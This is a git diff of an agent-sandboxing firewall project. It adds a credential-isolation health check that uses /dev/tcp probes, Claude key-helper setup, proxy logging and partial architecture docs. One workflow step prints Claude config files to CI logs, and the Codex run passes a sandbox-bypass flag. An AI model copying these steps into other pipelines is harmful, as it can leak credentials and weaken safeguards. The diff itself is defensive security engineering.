GH_AW_ALLOWED_DOMAINS: "*.githubusercontent.com,anthropic.com,api.anthropic.com,api.github.com,api.snapcraft.io,archive.ubuntu.com,azure.archive.ubuntu.com,cdn.playwright.dev,codeload.github.com,crl.geotrust.com,crl.globalsign.com,crl.identrust.com,crl.sectigo.com,crl.thawte.com,crl.usertrust.com,crl.verisign.com,crl3.digicert.com,crl4.digicert.com,crls.ssl.com,files.pythonhosted.org,ghcr.io,github-cloud.githubusercontent.com,github-cloud.s3.amazonaws.com,github.com,github.githubassets.com,host.docker.internal,json-schema.org,json.schemastore.org,keyserver.ubuntu.com,lfs.github.com,objects.githubusercontent.com,ocsp.digicert.com,ocsp.geotrust.com,ocsp.globalsign.com,ocsp.identrust.com,ocsp.sectigo.com,ocsp.ssl.com,ocsp.thawte.com,ocsp.usertrust.com,ocsp.verisign.com,packagecloud.io,packages.cloud.google.com,packages.microsoft.com,playwright.download.prss.microsoft.com,ppa.launchpad.net,pypi.org,raw.githubusercontent.com,registry.npmjs.org,s.symcb.com,s.symcd.com,security.ubuntu.com,sentry.io,statsig.anthropic.com,ts-crl.ws.symantec.com,ts-ocsp.ws.symantec.com"
@@ -858,7 +886,7 @@ jobs:
if-no-files-found: warn
- name: Parse agent logs for step summary
if: always()
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_AW_AGENT_OUTPUT: /tmp/gh-aw/agent-stdio.log
with:
@@ -869,7 +897,7 @@ jobs:
await main();
- name: Parse MCP gateway logs for step summary
if: always()
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
with:
script: |
const { setupGlobals } = require('/opt/gh-aw/actions/setup_globals.cjs');
@@ -892,6 +920,9 @@ jobs:
with:
name: cache-memory
path: /tmp/gh-aw/cache-memory
+ - if: always()
+ name: Show final Claude Code config
+ run: "echo \"=== Final Claude Code Config ===\"\nif [ -f ~/.claude.json ]; then\n echo \"File: ~/.claude.json\"\n cat ~/.claude.json\nelse\n echo \"~/.claude.json not found\"\nfi\nif [ -f ~/.claude/config.json ]; then\n echo \"\"\n echo \"File: ~/.claude/config.json (legacy)\"\n cat ~/.claude/config.json\nelse\n echo \"~/.claude/config.json not found\"\nfi\n"
- name: Validate safe outputs were invoked
run: "OUTPUTS_FILE=\"${GH_AW_SAFE_OUTPUTS:-/opt/gh-aw/safeoutputs/outputs.jsonl}\"\nif [ ! -s \"$OUTPUTS_FILE\" ]; then\n echo \"::error::No safe outputs were invoked. Smoke tests require the agent to call safe output tools.\"\n exit 1\nfi\necho \"Safe output entries found: $(wc -l < \"$OUTPUTS_FILE\")\"\nif [ \"$GITHUB_EVENT_NAME\" = \"pull_request\" ]; then\n if ! grep -q '\"add_comment\"' \"$OUTPUTS_FILE\"; then\n echo \"::error::Agent did not call add_comment on a pull_request trigger.\"\n exit 1\n fi\n echo \"add_comment verified for PR trigger\"\nfi\necho \"Safe output validation passed\""
@@ -906,6 +937,7 @@ jobs:
/tmp/gh-aw/aw_info.json
/tmp/gh-aw/mcp-logs/
/tmp/gh-aw/sandbox/firewall/logs/
+ /tmp/gh-aw/sandbox/firewall/api-proxy-logs/
/tmp/gh-aw/agent-stdio.log
/tmp/gh-aw/agent/
if-no-files-found: ignore
@@ -930,20 +962,9 @@ jobs:
total_count: ${{ steps.missing_tool.outputs.total_count }}
steps:
- name: Setup Scripts
- uses: github/gh-aw/actions/setup@7a970851c1090295e55a16e549c61ba1ce227f16 # v0.42.17
+ uses: github/gh-aw/actions/setup@v0.43.23
with:
destination: /opt/gh-aw/actions
- - name: Debug job inputs
- env:
- COMMENT_ID: ${{ needs.activation.outputs.comment_id }}
- COMMENT_REPO: ${{ needs.activation.outputs.comment_repo }}
- AGENT_OUTPUT_TYPES: ${{ needs.agent.outputs.output_types }}
- AGENT_CONCLUSION: ${{ needs.agent.result }}
- run: |
- echo "Comment ID: $COMMENT_ID"
- echo "Comment Repo: $COMMENT_REPO"
- echo "Agent Output Types: $AGENT_OUTPUT_TYPES"
- echo "Agent Conclusion: $AGENT_CONCLUSION"
- name: Download agent output artifact
continue-on-error: true
uses: actions/download-artifact@018cc2cf5baa6db3ef3c5f8a56943fffe632ef53 # v6.0.0
@@ -957,7 +978,7 @@ jobs:
echo "GH_AW_AGENT_OUTPUT=/tmp/gh-aw/safeoutputs/agent_output.json" >> "$GITHUB_ENV"
- name: Process No-Op Messages
id: noop
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_AW_AGENT_OUTPUT: ${{ env.GH_AW_AGENT_OUTPUT }}
GH_AW_NOOP_MAX: 1
@@ -971,7 +992,7 @@ jobs:
await main();
- name: Record Missing Tool
id: missing_tool
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_AW_AGENT_OUTPUT: ${{ env.GH_AW_AGENT_OUTPUT }}
GH_AW_WORKFLOW_NAME: "Smoke Claude"
@@ -984,12 +1005,13 @@ jobs:
await main();
- name: Handle Agent Failure
id: handle_agent_failure
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_AW_AGENT_OUTPUT: ${{ env.GH_AW_AGENT_OUTPUT }}
GH_AW_WORKFLOW_NAME: "Smoke Claude"
GH_AW_RUN_URL: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}
GH_AW_AGENT_CONCLUSION: ${{ needs.agent.result }}
+ GH_AW_WORKFLOW_ID: "smoke-claude"
GH_AW_SECRET_VERIFICATION_RESULT: ${{ needs.agent.outputs.secret_verification_result }}
GH_AW_CHECKOUT_PR_SUCCESS: ${{ needs.agent.outputs.checkout_pr_success }}
GH_AW_SAFE_OUTPUT_MESSAGES: "{\"footer\":\"\\u003e π₯ *[THE END] β Illustrated by [{workflow_name}]({run_url})*\",\"runStarted\":\"π₯ **WHOOSH!** [{workflow_name}]({run_url}) springs into action on this {event_type}! *[Panel 1 begins...]*\",\"runSuccess\":\"π¬ **THE END** β [{workflow_name}]({run_url}) **MISSION: ACCOMPLISHED!** The hero saves the day! β¨\",\"runFailure\":\"π« **TO BE CONTINUED...** [{workflow_name}]({run_url}) {status}! Our hero faces unexpected challenges...\"}"
@@ -1002,7 +1024,7 @@ jobs:
await main();
- name: Handle No-Op Message
id: handle_noop_message
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_AW_AGENT_OUTPUT: ${{ env.GH_AW_AGENT_OUTPUT }}
GH_AW_WORKFLOW_NAME: "Smoke Claude"
@@ -1019,7 +1041,7 @@ jobs:
await main();
- name: Update reaction comment with completion status
id: conclusion
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_AW_AGENT_OUTPUT: ${{ env.GH_AW_AGENT_OUTPUT }}
GH_AW_COMMENT_ID: ${{ needs.activation.outputs.comment_id }}
@@ -1047,7 +1069,7 @@ jobs:
success: ${{ steps.parse_results.outputs.success }}
steps:
- name: Setup Scripts
- uses: github/gh-aw/actions/setup@7a970851c1090295e55a16e549c61ba1ce227f16 # v0.42.17
+ uses: github/gh-aw/actions/setup@v0.43.23
with:
destination: /opt/gh-aw/actions
- name: Download agent artifacts
@@ -1068,7 +1090,7 @@ jobs:
run: |
echo "Agent output-types: $AGENT_OUTPUT_TYPES"
- name: Setup threat detection
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
WORKFLOW_NAME: "Smoke Claude"
WORKFLOW_DESCRIPTION: "Smoke test workflow that validates Claude engine functionality by reviewing recent PRs twice daily"
@@ -1090,12 +1112,12 @@ jobs:
CLAUDE_CODE_OAUTH_TOKEN: ${{ secrets.CLAUDE_CODE_OAUTH_TOKEN }}
ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
- name: Setup Node.js
- uses: actions/setup-node@395ad3262231945c25e8478fd5baf05154b1d79f # v6.1.0
+ uses: actions/setup-node@6044e13b5dc448c55e2357c09f80417699197238 # v6.2.0
with:
node-version: '24'
package-manager-cache: false
- name: Install Claude Code CLI
- run: npm install -g --silent @anthropic-ai/claude-code@2.1.34
+ run: npm install -g --silent @anthropic-ai/claude-code@2.1.39
- name: Execute Claude Code CLI
id: agentic_execution
# Allowed tools (sorted):
@@ -1137,7 +1159,7 @@ jobs:
MCP_TOOL_TIMEOUT: 60000
- name: Parse threat detection results
id: parse_results
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
with:
script: |
const { setupGlobals } = require('/opt/gh-aw/actions/setup_globals.cjs');
@@ -1176,7 +1198,7 @@ jobs:
process_safe_outputs_temporary_id_map: ${{ steps.process_safe_outputs.outputs.temporary_id_map }}
steps:
- name: Setup Scripts
- uses: github/gh-aw/actions/setup@7a970851c1090295e55a16e549c61ba1ce227f16 # v0.42.17
+ uses: github/gh-aw/actions/setup@v0.43.23
with:
destination: /opt/gh-aw/actions
- name: Download agent output artifact
@@ -1192,7 +1214,7 @@ jobs:
echo "GH_AW_AGENT_OUTPUT=/tmp/gh-aw/safeoutputs/agent_output.json" >> "$GITHUB_ENV"
- name: Process Safe Outputs
id: process_safe_outputs
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_AW_AGENT_OUTPUT: ${{ env.GH_AW_AGENT_OUTPUT }}
GH_AW_SAFE_OUTPUTS_HANDLER_CONFIG: "{\"add_comment\":{\"hide_older_comments\":true,\"max\":1},\"add_labels\":{\"allowed\":[\"smoke-claude\"]},\"missing_data\":{},\"missing_tool\":{}}"
@@ -1213,7 +1235,7 @@ jobs:
permissions: {}
steps:
- name: Setup Scripts
- uses: github/gh-aw/actions/setup@7a970851c1090295e55a16e549c61ba1ce227f16 # v0.42.17
+ uses: github/gh-aw/actions/setup@v0.43.23
with:
destination: /opt/gh-aw/actions
- name: Download cache-memory artifact (default)
@@ -1225,6 +1247,6 @@ jobs:
- name: Save cache-memory to cache (default)
uses: actions/cache/save@0057852bfaa89a56745cba8c7296529d2fc39830 # v4.3.0
with:
- key: memory-${{ github.workflow }}-${{ github.run_id }}
+ key: memory-${{ env.GH_AW_WORKFLOW_ID_SANITIZED }}-${{ github.run_id }}
path: /tmp/gh-aw/cache-memory
diff --git a/.github/workflows/smoke-claude.md b/.github/workflows/smoke-claude.md
index 2320fc40..b5388c98 100644
--- a/.github/workflows/smoke-claude.md
+++ b/.github/workflows/smoke-claude.md
@@ -49,6 +49,23 @@ safe-outputs:
run-failure: "π« **TO BE CONTINUED...** [{workflow_name}]({run_url}) {status}! Our hero faces unexpected challenges..."
timeout-minutes: 10
post-steps:
+ - name: Show final Claude Code config
+ if: always()
+ run: |
+ echo "=== Final Claude Code Config ==="
+ if [ -f ~/.claude.json ]; then
+ echo "File: ~/.claude.json"
+ cat ~/.claude.json
+ else
+ echo "~/.claude.json not found"
+ fi
+ if [ -f ~/.claude/config.json ]; then
+ echo ""
+ echo "File: ~/.claude/config.json (legacy)"
+ cat ~/.claude/config.json
+ else
+ echo "~/.claude/config.json not found"
+ fi
- name: Validate safe outputs were invoked
run: |
OUTPUTS_FILE="${GH_AW_SAFE_OUTPUTS:-/opt/gh-aw/safeoutputs/outputs.jsonl}"
diff --git a/.github/workflows/smoke-codex.lock.yml b/.github/workflows/smoke-codex.lock.yml
index ce77a62e..baea8deb 100644
--- a/.github/workflows/smoke-codex.lock.yml
+++ b/.github/workflows/smoke-codex.lock.yml
@@ -1381,7 +1381,7 @@ jobs:
run: |
set -o pipefail
mkdir -p "$CODEX_HOME/logs"
- sudo -E awf --env-all --container-workdir "${GITHUB_WORKSPACE}" --allow-domains '*.githubusercontent.com,172.30.0.1,api.openai.com,api.snapcraft.io,archive.ubuntu.com,azure.archive.ubuntu.com,cdn.playwright.dev,codeload.github.com,crl.geotrust.com,crl.globalsign.com,crl.identrust.com,crl.sectigo.com,crl.thawte.com,crl.usertrust.com,crl.verisign.com,crl3.digicert.com,crl4.digicert.com,crls.ssl.com,github-cloud.githubusercontent.com,github-cloud.s3.amazonaws.com,github.githubassets.com,host.docker.internal,json-schema.org,json.schemastore.org,keyserver.ubuntu.com,lfs.github.com,mcp.tavily.com,objects.githubusercontent.com,ocsp.digicert.com,ocsp.geotrust.com,ocsp.globalsign.com,ocsp.identrust.com,ocsp.sectigo.com,ocsp.ssl.com,ocsp.thawte.com,ocsp.usertrust.com,ocsp.verisign.com,openai.com,packagecloud.io,packages.cloud.google.com,packages.microsoft.com,playwright.download.prss.microsoft.com,ppa.launchpad.net,raw.githubusercontent.com,s.symcb.com,s.symcd.com,security.ubuntu.com,ts-crl.ws.symantec.com,ts-ocsp.ws.symantec.com' --log-level info --proxy-logs-dir /tmp/gh-aw/sandbox/firewall/logs --enable-host-access --build-local \
+ sudo -E awf --env-all --container-workdir "${GITHUB_WORKSPACE}" --allow-domains '*.githubusercontent.com,172.30.0.1,api.openai.com,api.snapcraft.io,archive.ubuntu.com,azure.archive.ubuntu.com,cdn.playwright.dev,codeload.github.com,crl.geotrust.com,crl.globalsign.com,crl.identrust.com,crl.sectigo.com,crl.thawte.com,crl.usertrust.com,crl.verisign.com,crl3.digicert.com,crl4.digicert.com,crls.ssl.com,github-cloud.githubusercontent.com,github-cloud.s3.amazonaws.com,github.githubassets.com,host.docker.internal,json-schema.org,json.schemastore.org,keyserver.ubuntu.com,lfs.github.com,mcp.tavily.com,objects.githubusercontent.com,ocsp.digicert.com,ocsp.geotrust.com,ocsp.globalsign.com,ocsp.identrust.com,ocsp.sectigo.com,ocsp.ssl.com,ocsp.thawte.com,ocsp.usertrust.com,ocsp.verisign.com,openai.com,packagecloud.io,packages.cloud.google.com,packages.microsoft.com,playwright.download.prss.microsoft.com,ppa.launchpad.net,raw.githubusercontent.com,s.symcb.com,s.symcd.com,security.ubuntu.com,ts-crl.ws.symantec.com,ts-ocsp.ws.symantec.com' --log-level info --proxy-logs-dir /tmp/gh-aw/sandbox/firewall/logs --enable-host-access --enable-api-proxy --build-local \
-- /bin/bash -c 'export PATH="$(find /opt/hostedtoolcache -maxdepth 4 -type d -name bin 2>/dev/null | tr '\''\n'\'' '\'':'\'')$PATH"; [ -n "$GOROOT" ] && export PATH="$GOROOT/bin:$PATH" || true && INSTRUCTION="$(cat /tmp/gh-aw/aw-prompts/prompt.txt)" && codex ${GH_AW_MODEL_AGENT_CODEX:+-c model="$GH_AW_MODEL_AGENT_CODEX" }exec --dangerously-bypass-approvals-and-sandbox --skip-git-repo-check "$INSTRUCTION"' \
2>&1 | tee /tmp/gh-aw/agent-stdio.log
env:
diff --git a/README.md b/README.md
index f57448ef..1a80caf2 100644
--- a/README.md
+++ b/README.md
@@ -35,6 +35,7 @@ The `--` separator divides firewall options from the command to run.
- [Usage guide](docs/usage.md) β CLI flags, domain allowlists, examples
- [Chroot mode](docs/chroot-mode.md) β use host binaries with network isolation
- [API proxy sidecar](docs/api-proxy-sidecar.md) β secure credential management for LLM APIs
+- [Authentication architecture](docs/authentication-architecture.md) β deep dive into token handling and credential isolation
- [SSL Bump](docs/ssl-bump.md) β HTTPS content inspection for URL path filtering
- [GitHub Actions](docs/github_actions.md) β CI/CD integration and MCP server setup
- [Environment variables](docs/environment.md) β passing environment variables to containers
diff --git a/containers/agent/Dockerfile b/containers/agent/Dockerfile
index 717c56cf..305a4f78 100644
--- a/containers/agent/Dockerfile
+++ b/containers/agent/Dockerfile
@@ -62,11 +62,13 @@ RUN if ! getent group awfuser >/dev/null 2>&1; then \
mkdir -p /home/awfuser/.copilot/logs && \
chown -R awfuser:awfuser /home/awfuser
-# Copy iptables setup script and PID logger
+# Copy iptables setup script, PID logger, API proxy health check, and Claude key helper
COPY setup-iptables.sh /usr/local/bin/setup-iptables.sh
COPY entrypoint.sh /usr/local/bin/entrypoint.sh
COPY pid-logger.sh /usr/local/bin/pid-logger.sh
-RUN chmod +x /usr/local/bin/setup-iptables.sh /usr/local/bin/entrypoint.sh /usr/local/bin/pid-logger.sh
+COPY api-proxy-health-check.sh /usr/local/bin/api-proxy-health-check.sh
+COPY get-claude-key.sh /usr/local/bin/get-claude-key.sh
+RUN chmod +x /usr/local/bin/setup-iptables.sh /usr/local/bin/entrypoint.sh /usr/local/bin/pid-logger.sh /usr/local/bin/api-proxy-health-check.sh /usr/local/bin/get-claude-key.sh
# Copy pre-built one-shot-token library from rust-builder stage
# This prevents tokens from being read multiple times (e.g., by malicious code)
diff --git a/containers/agent/api-proxy-health-check.sh b/containers/agent/api-proxy-health-check.sh
new file mode 100755
index 00000000..30cc2223
--- /dev/null
+++ b/containers/agent/api-proxy-health-check.sh
@@ -0,0 +1,108 @@
+#!/bin/bash
+# api-proxy-health-check.sh
+# Pre-flight health check to verify API proxy credential isolation
+# This script ensures:
+# 1. API keys are NOT present in agent environment (credential isolation working)
+# 2. API proxy is reachable and healthy (connectivity established)
+#
+# Usage: run this script before launching the agent command (the container entrypoint invokes it after iptables setup)
+# Returns: 0 if checks pass, 1 if checks fail (prevents agent from running)
+
+set -e
+
+echo "[health-check] API Proxy Pre-flight Check"
+echo "[health-check] =========================================="
+
+# Track if any API proxy is configured
+API_PROXY_CONFIGURED=false
+
+# Check Claude/Anthropic configuration
+if [ -n "$ANTHROPIC_BASE_URL" ]; then
+ API_PROXY_CONFIGURED=true
+ echo "[health-check] Checking Anthropic API proxy configuration..."
+
+ # Verify credentials are NOT in agent environment
+ if [ -n "$ANTHROPIC_API_KEY" ] || [ -n "$CLAUDE_API_KEY" ]; then
+ echo "[health-check][ERROR] Anthropic API key found in agent environment!"
+ echo "[health-check][ERROR] Credential isolation failed - keys should only be in api-proxy container"
+    # ${VAR:+[set]} prints "[set]" only when the variable is non-empty, without echoing the secret itself
+    echo "[health-check][ERROR] ANTHROPIC_API_KEY=${ANTHROPIC_API_KEY:+[set]}"
+    echo "[health-check][ERROR] CLAUDE_API_KEY=${CLAUDE_API_KEY:+[set]}"
+ exit 1
+ fi
+  echo "[health-check] ✓ Anthropic credentials NOT in agent environment (correct)"
+
+ # Verify ANTHROPIC_AUTH_TOKEN is placeholder (if present)
+ if [ -n "$ANTHROPIC_AUTH_TOKEN" ]; then
+ if [ "$ANTHROPIC_AUTH_TOKEN" != "placeholder-token-for-credential-isolation" ]; then
+ echo "[health-check][ERROR] ANTHROPIC_AUTH_TOKEN contains non-placeholder value!"
+ echo "[health-check][ERROR] Token should be 'placeholder-token-for-credential-isolation'"
+ exit 1
+ fi
+    echo "[health-check] ✓ ANTHROPIC_AUTH_TOKEN is placeholder value (correct)"
+ fi
+
+ # Perform health check using BASE_URL
+ echo "[health-check] Testing connectivity to Anthropic API proxy at $ANTHROPIC_BASE_URL..."
+
+ # Extract host and port from BASE_URL (format: http://IP:PORT)
+ PROXY_HOST=$(echo "$ANTHROPIC_BASE_URL" | sed -E 's|^https?://([^:]+):.*|\1|')
+ PROXY_PORT=$(echo "$ANTHROPIC_BASE_URL" | sed -E 's|^https?://[^:]+:([0-9]+).*|\1|')
+
+ # Test TCP connectivity with timeout
+ if timeout 5 bash -c "cat < /dev/null > /dev/tcp/$PROXY_HOST/$PROXY_PORT" 2>/dev/null; then
+    echo "[health-check] ✓ Anthropic API proxy is reachable at $ANTHROPIC_BASE_URL"
+ else
+ echo "[health-check][ERROR] Cannot connect to Anthropic API proxy at $ANTHROPIC_BASE_URL"
+ echo "[health-check][ERROR] Proxy may not be running or network is blocked"
+ exit 1
+ fi
+fi
+
+# Check OpenAI/Codex configuration
+if [ -n "$OPENAI_BASE_URL" ]; then
+ API_PROXY_CONFIGURED=true
+ echo "[health-check] Checking OpenAI API proxy configuration..."
+
+ # Verify credentials are NOT in agent environment
+ # Note: CODEX_API_KEY check is temporarily disabled - Codex receives credentials directly
+ if [ -n "$OPENAI_API_KEY" ] || [ -n "$OPENAI_KEY" ]; then
+ echo "[health-check][ERROR] OpenAI API key found in agent environment!"
+ echo "[health-check][ERROR] Credential isolation failed - keys should only be in api-proxy container"
+    echo "[health-check][ERROR] OPENAI_API_KEY=${OPENAI_API_KEY:+[set]}"
+    # echo "[health-check][ERROR] CODEX_API_KEY=${CODEX_API_KEY:+[set]}" # Temporarily disabled - Codex uses direct credentials
+    echo "[health-check][ERROR] OPENAI_KEY=${OPENAI_KEY:+[set]}"
+ exit 1
+ fi
+  echo "[health-check] ✓ OpenAI credentials NOT in agent environment (correct)"
+ # Note: CODEX_API_KEY is intentionally passed through for Codex agent compatibility
+
+ # Perform health check using BASE_URL
+ echo "[health-check] Testing connectivity to OpenAI API proxy at $OPENAI_BASE_URL..."
+
+ # Extract host and port from BASE_URL (format: http://IP:PORT)
+ PROXY_HOST=$(echo "$OPENAI_BASE_URL" | sed -E 's|^https?://([^:]+):.*|\1|')
+ PROXY_PORT=$(echo "$OPENAI_BASE_URL" | sed -E 's|^https?://[^:]+:([0-9]+).*|\1|')
+
+ # Test TCP connectivity with timeout
+ if timeout 5 bash -c "cat < /dev/null > /dev/tcp/$PROXY_HOST/$PROXY_PORT" 2>/dev/null; then
+    echo "[health-check] ✓ OpenAI API proxy is reachable at $OPENAI_BASE_URL"
+ else
+ echo "[health-check][ERROR] Cannot connect to OpenAI API proxy at $OPENAI_BASE_URL"
+ echo "[health-check][ERROR] Proxy may not be running or network is blocked"
+ exit 1
+ fi
+fi
+
+# Summary
+if [ "$API_PROXY_CONFIGURED" = "true" ]; then
+ echo "[health-check] =========================================="
+  echo "[health-check] ✓ All API proxy health checks passed"
+  echo "[health-check] ✓ Credential isolation verified"
+  echo "[health-check] ✓ Connectivity established"
+ echo "[health-check] =========================================="
+else
+ echo "[health-check] No API proxy configured (ANTHROPIC_BASE_URL and OPENAI_BASE_URL not set)"
+ echo "[health-check] Skipping health checks"
+fi
+
+exit 0
diff --git a/containers/agent/entrypoint.sh b/containers/agent/entrypoint.sh
index 52c4335f..eab7a845 100644
--- a/containers/agent/entrypoint.sh
+++ b/containers/agent/entrypoint.sh
@@ -114,6 +114,54 @@ fi
# Setup iptables rules
/usr/local/bin/setup-iptables.sh
+# Run API proxy health checks (verifies credential isolation and connectivity)
+# This must run AFTER iptables setup (which allows api-proxy traffic) but BEFORE user command
+# If health check fails, the script exits with non-zero code and prevents agent from running
+/usr/local/bin/api-proxy-health-check.sh || exit 1
+
+# Configure Claude Code API key helper
+# This ensures the apiKeyHelper is properly configured in the config file
+# The config file must exist before Claude Code starts for authentication to work
+# In chroot mode, we write to /host$HOME/.claude.json so it's accessible after chroot
+if [ -n "$CLAUDE_CODE_API_KEY_HELPER" ]; then
+ echo "[entrypoint] Claude Code API key helper configured: $CLAUDE_CODE_API_KEY_HELPER"
+
+ # In chroot mode, write to /host path so file is accessible after chroot transition
+ if [ "${AWF_CHROOT_ENABLED}" = "true" ]; then
+ CONFIG_FILE="/host$HOME/.claude.json"
+ else
+ CONFIG_FILE="$HOME/.claude.json"
+ fi
+
+ if [ -f "$CONFIG_FILE" ]; then
+ # File exists - check if it has apiKeyHelper
+ if grep -q '"apiKeyHelper"' "$CONFIG_FILE"; then
+ # apiKeyHelper exists - validate it matches the environment variable
+ echo "[entrypoint] Claude Code config file exists with apiKeyHelper, validating..."
+ CONFIGURED_HELPER=$(grep -o '"apiKeyHelper":"[^"]*"' "$CONFIG_FILE" | cut -d'"' -f4)
+ if [ "$CONFIGURED_HELPER" != "$CLAUDE_CODE_API_KEY_HELPER" ]; then
+ echo "[entrypoint][ERROR] apiKeyHelper mismatch:"
+ echo "[entrypoint][ERROR] Environment variable: $CLAUDE_CODE_API_KEY_HELPER"
+ echo "[entrypoint][ERROR] Config file value: $CONFIGURED_HELPER"
+ exit 1
+ fi
+      echo "[entrypoint] ✓ Claude Code API key helper validated: $CLAUDE_CODE_API_KEY_HELPER"
+ else
+ # File exists but no apiKeyHelper - write it (overwrites empty {} created by docker-manager)
+ echo "[entrypoint] Claude Code config file exists but missing apiKeyHelper, writing..."
+ echo "{\"apiKeyHelper\":\"$CLAUDE_CODE_API_KEY_HELPER\"}" > "$CONFIG_FILE"
+ chmod 666 "$CONFIG_FILE"
+      echo "[entrypoint] ✓ Wrote apiKeyHelper to $CONFIG_FILE"
+ fi
+ else
+ # File doesn't exist - create it
+ echo "[entrypoint] Creating Claude Code config file with apiKeyHelper..."
+ echo "{\"apiKeyHelper\":\"$CLAUDE_CODE_API_KEY_HELPER\"}" > "$CONFIG_FILE"
+ chmod 666 "$CONFIG_FILE"
+    echo "[entrypoint] ✓ Created $CONFIG_FILE with apiKeyHelper: $CLAUDE_CODE_API_KEY_HELPER"
+ fi
+fi
+
# Print proxy environment
echo "[entrypoint] Proxy configuration:"
echo "[entrypoint] HTTP_PROXY=$HTTP_PROXY"
diff --git a/containers/agent/get-claude-key.sh b/containers/agent/get-claude-key.sh
new file mode 100755
index 00000000..c459f6e5
--- /dev/null
+++ b/containers/agent/get-claude-key.sh
@@ -0,0 +1,20 @@
+#!/bin/bash
+# API Key Helper for Claude Code
+# This script outputs a placeholder API key since the real key is held
+# exclusively in the api-proxy sidecar container for credential isolation.
+#
+# The api-proxy intercepts requests and injects the real ANTHROPIC_API_KEY,
+# so this placeholder key will never reach the actual Anthropic API.
+#
+# This approach ensures:
+# 1. Claude Code agent never has access to the real API key
+# 2. Only api-proxy container holds the real credentials
+# 3. Health checks verify keys are NOT in agent environment
+
+# Log helper invocation to stderr (stdout is reserved for the API key)
+echo "[get-claude-key.sh] API key helper invoked at $(date -Iseconds)" >&2
+echo "[get-claude-key.sh] Returning placeholder key for credential isolation" >&2
+echo "[get-claude-key.sh] Real authentication via ANTHROPIC_BASE_URL=${ANTHROPIC_BASE_URL:-not set}" >&2
+
+# Output a placeholder key (will be replaced by api-proxy)
+echo "sk-ant-placeholder-key-for-credential-isolation"
diff --git a/containers/api-proxy/Dockerfile b/containers/api-proxy/Dockerfile
index 7f8459f6..3e8d8d85 100644
--- a/containers/api-proxy/Dockerfile
+++ b/containers/api-proxy/Dockerfile
@@ -28,5 +28,6 @@ USER apiproxy
# 10001 - Anthropic API proxy
EXPOSE 10000 10001
-# Start the proxy server
-CMD ["node", "server.js"]
+# Redirect stdout/stderr to log file for persistence
+# Use shell form to enable redirection and tee for both file and console
+CMD node server.js 2>&1 | tee -a /var/log/api-proxy/api-proxy.log
diff --git a/containers/api-proxy/server.js b/containers/api-proxy/server.js
index bf5dbb52..8f381224 100644
--- a/containers/api-proxy/server.js
+++ b/containers/api-proxy/server.js
@@ -175,6 +175,7 @@ if (OPENAI_API_KEY) {
}
console.log(`[OpenAI Proxy] ${sanitizeForLog(req.method)} ${sanitizeForLog(req.url)}`);
+ console.log(`[OpenAI Proxy] Injecting Authorization header with OPENAI_API_KEY`);
proxyRequest(req, res, 'api.openai.com', {
'Authorization': `Bearer ${OPENAI_API_KEY}`,
});
@@ -216,6 +217,7 @@ if (ANTHROPIC_API_KEY) {
}
console.log(`[Anthropic Proxy] ${sanitizeForLog(req.method)} ${sanitizeForLog(req.url)}`);
+ console.log(`[Anthropic Proxy] Injecting x-api-key header with ANTHROPIC_API_KEY`);
// Only set anthropic-version as default; preserve agent-provided version
const anthropicHeaders = { 'x-api-key': ANTHROPIC_API_KEY };
if (!req.headers['anthropic-version']) {
diff --git a/docs/api-proxy-sidecar.md b/docs/api-proxy-sidecar.md
index 0c1058b8..832897a5 100644
--- a/docs/api-proxy-sidecar.md
+++ b/docs/api-proxy-sidecar.md
@@ -2,6 +2,9 @@
The AWF firewall supports an optional Node.js-based API proxy sidecar that securely holds LLM API credentials and automatically injects authentication headers while routing all traffic through Squid to respect domain whitelisting.
+> [!NOTE]
+> For a comprehensive deep dive into how AWF handles authentication tokens and credential isolation, see the [Authentication Architecture](authentication-architecture.md) guide.
+
## Overview
When enabled, the API proxy sidecar:
diff --git a/docs/authentication-architecture.md b/docs/authentication-architecture.md
new file mode 100644
index 00000000..a195de6e
--- /dev/null
+++ b/docs/authentication-architecture.md
@@ -0,0 +1,593 @@
+# Authentication Architecture: How AWF Handles LLM API Tokens
+
+## Overview
+
+The Agentic Workflow Firewall (AWF) implements a multi-layered security architecture to protect LLM API authentication tokens while providing transparent proxying for AI agent calls. This document explains the complete authentication flow, token isolation mechanisms, and network routing for both **OpenAI/Codex** and **Anthropic/Claude** APIs.
+
+> [!IMPORTANT]
+> **Both OpenAI/Codex and Anthropic/Claude use identical credential isolation architecture.** API keys are held exclusively in the api-proxy sidecar container (never in the agent container), and both providers route through the same Squid proxy for domain filtering. The only differences are the port numbers (10000 for OpenAI, 10001 for Anthropic) and authentication header formats (`Authorization: Bearer` vs `x-api-key`).
+
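+To make the symmetry concrete, here is an illustrative sketch (not taken from the AWF docs or tests) of how an agent reaches each provider through the sidecar; it assumes the `OPENAI_BASE_URL`/`ANTHROPIC_BASE_URL` variables described in the sections below, and uses the read-only `/v1/models` endpoints purely as an example:
+
+```bash
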